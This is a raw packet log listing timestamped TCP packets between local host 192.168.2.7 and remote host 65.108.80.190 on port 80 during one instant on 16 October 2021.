Oct 16, 2021 16:53:25.431914091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431931973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431955099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431977034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431991100 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431998968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432008028 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432010889 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432013988 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432022095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432044029 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432046890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432075024 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432076931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432095051 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432101011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432118893 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432125092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432146072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432147980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432163954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432176113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432197094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432199001 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432219982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432221889 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432240009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432241917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432260990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432265043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432286024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432311058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432321072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432333946 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432338953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432343006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432347059 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432354927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432375908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432382107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432399988 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432404995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432427883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432449102 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432466030 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432471037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432497025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432497978 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432521105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.432557106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432564020 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.432568073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.433900118 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.434282064 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.434300900 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.434350967 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.434367895 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.467757940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.467827082 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.467876911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.467921019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.468489885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.471729040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471775055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471811056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.471812963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471853018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.471862078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471878052 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.471908092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471935034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.471949100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.471991062 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472021103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472028017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472031116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472059965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472070932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472095013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472110033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472137928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472148895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472167969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472198963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472220898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472243071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472282887 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472291946 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472302914 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472322941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472359896 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472362995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472371101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472404957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472426891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472454071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472455025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472496033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472520113 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472543955 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472568989 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472587109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472589970 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472625971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472640038 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472665071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472703934 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472708941 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472717047 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472740889 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472769022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472779989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472810030 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472817898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472824097 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472877979 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472899914 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472924948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472948074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.472965956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.472994089 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473004103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473028898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473042965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473059893 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473079920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473100901 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473119974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473155975 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473157883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473177910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473206043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473227024 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473252058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473268032 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473299980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473345041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473347902 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473364115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473383904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473417997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473422050 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473459959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473463058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473500967 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473501921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473530054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473551035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473567009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473596096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473628044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473635912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473668098 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473690987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473728895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473768950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473768950 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473786116 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473792076 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473807096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473845959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473875046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473893881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473912001 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473937035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473937035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.473948002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.473977089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474014044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474020958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474037886 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474052906 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474069118 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474088907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474103928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474127054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474136114 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474164963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474193096 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474211931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474230051 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474255085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474292040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474306107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474317074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474349976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474387884 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474399090 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474407911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474426031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474463940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474478006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474493027 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474503994 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474550962 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474553108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474586010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474596024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474633932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474637985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474663019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474678993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474685907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474724054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474730015 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474761963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474782944 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474798918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474812031 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474838018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474853992 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474884987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474890947 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474929094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474962950 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.474967003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.474975109 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475007057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475023985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475047112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475064039 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475099087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475100994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475155115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475179911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475222111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475244045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475260019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475285053 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475307941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475322008 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475353003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475389957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475393057 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475403070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475435019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475435972 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475488901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475528955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475547075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475552082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475600958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475631952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475676060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475718021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475718975 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475754976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475780964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475784063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475837946 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475841045 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475898981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475907087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475940943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.475954056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.475981951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476003885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476036072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476064920 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476099014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476106882 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476155996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476160049 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476207972 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476236105 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476252079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476294041 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476305008 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476306915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476365089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476409912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476438999 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476464987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476466894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476470947 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476519108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476556063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476557970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476604939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476633072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476646900 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476648092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476659060 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476702929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476751089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476761103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476771116 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476809978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476814985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476865053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476875067 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476922035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476937056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.476972103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.476989985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477009058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477025986 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477051020 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477066040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477102041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477109909 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477154970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477178097 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477205992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477219105 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477260113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477269888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477319956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477339983 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477366924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477385998 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477420092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477435112 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477473021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477499962 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477511883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477534056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477555990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477577925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477612972 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477617979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477658987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.477675915 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.477716923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.507941961 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.507965088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.507985115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.508030891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.508064032 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517030954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517055035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517071962 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517086983 CEST	80	49737	65.108.80.190	192.168.2.7
